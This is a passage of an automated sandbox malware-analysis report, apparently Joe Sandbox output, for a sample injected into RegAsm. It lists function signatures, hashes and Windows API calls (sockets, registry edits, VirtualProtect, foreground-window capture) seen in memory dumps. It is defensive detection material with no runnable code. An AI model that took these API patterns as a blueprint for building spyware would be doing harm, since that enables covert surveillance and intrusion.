• Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
• Instruction ID: abaa11d5974e3e1b05dfd32ec0224f7ddc3d76465740e120717e363e7a178845
• Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
• Instruction Fuzzy Hash: A921382140838A6FF711CBB44C05FA67FD8DB172E0F198696E040CB147DDA89845C3AE
APIs
• send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
• WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
• SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: EventObjectSingleWaitsend
• String ID:
• API String ID: 3963590051-0
• Opcode ID: b1d66744df5c6cb587348be29f4f2b73cfa97db57556f8ad38e66ecf600c3840
• Instruction ID: ade4869c8039bafc3f5202e75afdfb18787be874a76dce876c460fae4797ad88
• Opcode Fuzzy Hash: b1d66744df5c6cb587348be29f4f2b73cfa97db57556f8ad38e66ecf600c3840
• Instruction Fuzzy Hash: 152124B2900119BBCB04ABA1DC95DEEB77CFF14314B00452FF515B71E2EB38AA15C6A4
APIs
• VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
• VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
• GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
Memory Dump Source
• Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
Similarity
• API ID: ProtectVirtual$HandleModule
• String ID:
• API String ID: 3519776433-0
• Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
• Instruction ID: 9138b94afbcae90e12a8614b592989542e7cb6e8cba5f1d72008c399686a5f74
• Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
• Instruction Fuzzy Hash: B7F0C2619497893CFA21C7B40C45EBA5FCCCB276E0B249A56F600C718BDCA5890693FE
APIs
• RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
• RegQueryValueExA.KERNEL32 ref: 00413622
• RegCloseKey.KERNEL32(?), ref: 0041362D
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
• Opcode ID: 6d7bb055a41a46af3afbf88891c67b332a8db22587d044117d184b09d82707ea
• Instruction ID: 0661f39b514c0023b6096d8878825bbc81d19e8e8981dfb5b132c5fecbfe39b6
• Opcode Fuzzy Hash: 6d7bb055a41a46af3afbf88891c67b332a8db22587d044117d184b09d82707ea
• Instruction Fuzzy Hash: 4A01D676900228FBCB209B91DC08DEF7F7DDB44B51F004066BB05A2240DA748E45DBA4
APIs
• RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 0041374F
• RegQueryValueExA.KERNEL32 ref: 00413768
• RegCloseKey.KERNEL32(00000000), ref: 00413773
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
• Opcode ID: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
• Instruction ID: cdc8bb2f12cdea1da97e3e4d454c68039a4c25ad8704162e95ac064a0ac82555
• Opcode Fuzzy Hash: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
• Instruction Fuzzy Hash: C301AD7540022DFBDF215F91DC04DEB3F38EF05761F008065BE09620A1E7358AA5EB94
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                                                                                                                                                                                  • RegQueryValueExA.KERNEL32 ref: 004135C2
                                                                                                                                                                                                  • RegCloseKey.KERNEL32(?), ref: 004135CD
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3677997916-0
                                                                                                                                                                                                  • Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                                                                                                                                                                  • Instruction ID: 3ea041f737baa467864e73cd7e114674dd940ed34319bd14b5ec79364d8ab256
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 39F01D76900218FFDF109FA09C45FEE7BBDEB04B11F1044A5BA04E6191D6359F549B94
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413551
                                                                                                                                                                                                  • RegQueryValueExA.KERNEL32 ref: 00413565
                                                                                                                                                                                                  • RegCloseKey.KERNEL32(?), ref: 00413570
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3677997916-0
                                                                                                                                                                                                  • Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                                                                                                                                                                  • Instruction ID: 960a54a16a1ccd4152458ec6927d20d37e2092670a33f2d7c306b576a706ad25
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 23E06532801238FBDF204FA29C0DDEB7F6CDF06BA1B000155BD0CA1111D2258E50E6E4
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                                                                                                                                                  • RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                                                                                                                                                                                                  • RegCloseKey.KERNEL32(004660B4), ref: 004138E6
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseCreateValue
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1818849710-0
                                                                                                                                                                                                  • Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                                                                                                                                                                  • Instruction ID: 04d77b696783773a8a307df6842786532c8303179302b097fa31242bc3118ae5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1EE06D72500318FBDF109FA0DC06FEA7BACEF04B62F104565BF09A6191D6358E14E7A8
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 10006AF0
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Info
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1807457897-3916222277
                                                                                                                                                                                                  • Opcode ID: 6cedc9456a51a48c8b79c853d380540c5183232597a17884e183f7c8afc1900e
                                                                                                                                                                                                  • Instruction ID: 7792c4a5177154c3e9ca344f7bd1be717728489360a1cc3eced530dab922c6d1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6cedc9456a51a48c8b79c853d380540c5183232597a17884e183f7c8afc1900e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D241FCB050429C9AFB21CF148C84BEABBEAEB49344F2444EDE5C9C6146D735AA85DF20
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _wcslen
                                                                                                                                                                                                  • String ID: pQG
                                                                                                                                                                                                  • API String ID: 176396367-3769108836
                                                                                                                                                                                                  • Opcode ID: 5581d9da4b44419582c52f90d2dac08d2b870ca85f72c258eca40ba8ececd965
                                                                                                                                                                                                  • Instruction ID: e26466b944e621eef81fbe5db30e3e3b172770e45cde188e8c087a2518f8d89f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5581d9da4b44419582c52f90d2dac08d2b870ca85f72c258eca40ba8ececd965
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 631181319002059BCB15EF66E852AEF7BB4AF54314B10413FF446A62E2EF78AD15CB98
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,5EFC4D8B,00000100,?,5EFC4D8B,00000000), ref: 10005F8A
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: String
                                                                                                                                                                                                  • String ID: LCMapStringEx
                                                                                                                                                                                                  • API String ID: 2568140703-3893581201
                                                                                                                                                                                                  • Opcode ID: 9311d150e09a2ea236c127db5a9a9399c35e1f3cdcd5bb094b510bbe54d2b48d
                                                                                                                                                                                                  • Instruction ID: 984c2aabb43d86beb2eff1d34daabde68608d0bd8f0a2971fe4c3ea005c0c61c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9311d150e09a2ea236c127db5a9a9399c35e1f3cdcd5bb094b510bbe54d2b48d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9401D332500159BBEF129F90CC05EEE7F66EF08390F018115FE1826124CB369971AB95
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Alloc
                                                                                                                                                                                                  • String ID: FlsAlloc
                                                                                                                                                                                                  • API String ID: 2773662609-671089009
                                                                                                                                                                                                  • Opcode ID: 5ade6ed448300679f83b5d20ac83fd3ad7347746afaf7e54a560ff76d56e46a0
                                                                                                                                                                                                  • Instruction ID: c304bc83fd0672a576945d725d7c66755e55876121cef6cfa1c70df20931aaa1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5ade6ed448300679f83b5d20ac83fd3ad7347746afaf7e54a560ff76d56e46a0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 43E0E535600228ABF325EB608C15EEFBBA4DB583D1B01405AFE0966209CE326D0185D6
APIs
• try_get_function.LIBVCRUNTIME ref: 10003B06
Strings
Memory Dump Source
• Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
Similarity
• API ID: try_get_function
• String ID: FlsAlloc
• API String ID: 2742660187-671089009
APIs
• try_get_function.LIBVCRUNTIME ref: 00438E29
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: try_get_function
• String ID: FlsAlloc
• API String ID: 2742660187-671089009
APIs
• GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B85B
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: GlobalMemoryStatus
• String ID: @
• API String ID: 1890195054-2766056989
APIs
  • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
• IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,10006CC1,?,00000000), ref: 10006E94
• GetCPInfo.KERNEL32(00000000,10006CC1,?,?,?,10006CC1,?,00000000), ref: 10006EA7
Memory Dump Source
• Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
Similarity
• API ID: CodeInfoPageValid
• String ID:
• API String ID: 546120528-0
APIs
  • Part of subcall function 10005AF6: GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
  • Part of subcall function 10005AF6: _free.LIBCMT ref: 10005B2D
  • Part of subcall function 10005AF6: SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
  • Part of subcall function 10005AF6: _abort.LIBCMT ref: 10005B74
  • Part of subcall function 10006D7E: _abort.LIBCMT ref: 10006DB0
  • Part of subcall function 10006D7E: _free.LIBCMT ref: 10006DE4
  • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
• _free.LIBCMT ref: 10006CD7
• _free.LIBCMT ref: 10006D0D
Memory Dump Source
• Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
Similarity
• API ID: _free$ErrorLast_abort
• String ID:
• API String ID: 2991157371-0
APIs
  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
  • Part of subcall function 0044F0F7: _abort.LIBCMT ref: 0044F129
  • Part of subcall function 0044F0F7: _free.LIBCMT ref: 0044F15D
  • Part of subcall function 0044ED6C: GetOEMCP.KERNEL32(00000000,?,?,0044EFF5,?), ref: 0044ED97
• _free.LIBCMT ref: 0044F050
• _free.LIBCMT ref: 0044F086
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: _free$ErrorLast_abort
• String ID:
• API String ID: 2991157371-0
APIs
• socket.WS2_32(00000002,00000001,00000006), ref: 00404852
• CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
  • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: CreateEventStartupsocket
• String ID:
• API String ID: 1953588214-0
                                                                                                                                                                                                  • Opcode ID: 1e452a305f2f2717745e8e1604374189d9659e6cad2ea1bb393ee33250cb33e3
                                                                                                                                                                                                  • Instruction ID: ed99eca956a2b7a9b5891d615cc725ddac26720bb1770143763ad27df005c20f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1e452a305f2f2717745e8e1604374189d9659e6cad2ea1bb393ee33250cb33e3
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 760171B1408B809ED7359F38A8456877FE0AB55304F048D6EF1DA97B91D3B5A881CB18
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • dllmain_crt_process_attach.LIBCMT ref: 10001F22
                                                                                                                                                                                                  • dllmain_crt_process_detach.LIBCMT ref: 10001F35
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: dllmain_crt_process_attachdllmain_crt_process_detach
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3750050125-0
                                                                                                                                                                                                  • Opcode ID: a083a93b774f70b3c38eb0fc97558fdcbb4f7ca7475fb23d15f98f17c44c9911
                                                                                                                                                                                                  • Instruction ID: 876e10da87b92cf64c449b9c471687dd08192407587f6dd1e67cbf7e6a41b987
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a083a93b774f70b3c38eb0fc97558fdcbb4f7ca7475fb23d15f98f17c44c9911
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A0E0D83646820BEAFB11EEB498156FD37D8EB011C1F100536B851C115ECB39EB90F121
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: e70bc1220f3c0aaa69c113e67994fb024de36f7e04ed45e289cd83dd41bab85d
                                                                                                                                                                                                  • Instruction ID: 1e9d0a06bdb6e9f7b23a96960dfc4b712b0be9606a3b942e14a6d4fe6a34620f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e70bc1220f3c0aaa69c113e67994fb024de36f7e04ed45e289cd83dd41bab85d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: EBF0E2706042016BCB0C8B34CD50B2A37954B84325F248F7FF02BD61E0C73EC8918A0D
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetForegroundWindow.USER32 ref: 0041BB49
                                                                                                                                                                                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041BB5C
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Window$ForegroundText
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 29597999-0
                                                                                                                                                                                                  • Opcode ID: 2784d0b2db336add8319ad638143428ee57387129fbd6e48793ce9af45086994
                                                                                                                                                                                                  • Instruction ID: 8c7c0eb369f00208a7459315ff6bb8442305c4ed6b2016914032ba092e23deac
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2784d0b2db336add8319ad638143428ee57387129fbd6e48793ce9af45086994
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 21E04875A00328A7E720A7A5AC4EFD5776C9708755F0001AEBA1CD61C2EDB4AD448BE5
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • getaddrinfo.WS2_32(00000000,00000000,00000000,00472ADC,004750E4,00000000,004151C3,00000000,00000001), ref: 00414F46
                                                                                                                                                                                                  • WSASetLastError.WS2_32(00000000), ref: 00414F4B
                                                                                                                                                                                                    • Part of subcall function 00414DC1: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                                                                                                                                                                                    • Part of subcall function 00414DC1: LoadLibraryA.KERNEL32(?), ref: 00414E52
                                                                                                                                                                                                    • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                                                                                                                                                                                    • Part of subcall function 00414DC1: FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                                                                                                                                                                                    • Part of subcall function 00414DC1: LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                                                                                                                                                                                    • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                                                                                                                                                                                    • Part of subcall function 00414DC1: FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                                                                                                                                                                                    • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1170566393-0
                                                                                                                                                                                                  • Opcode ID: 63e6a57adcb3e9d376df8b1f7a36805de8af56205c6b0d3f673684859221182d
                                                                                                                                                                                                  • Instruction ID: 64a5677b7ab27dcaa32d5743096e05a6e92bfc5102e3e8065abb212a99eff034
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 63e6a57adcb3e9d376df8b1f7a36805de8af56205c6b0d3f673684859221182d
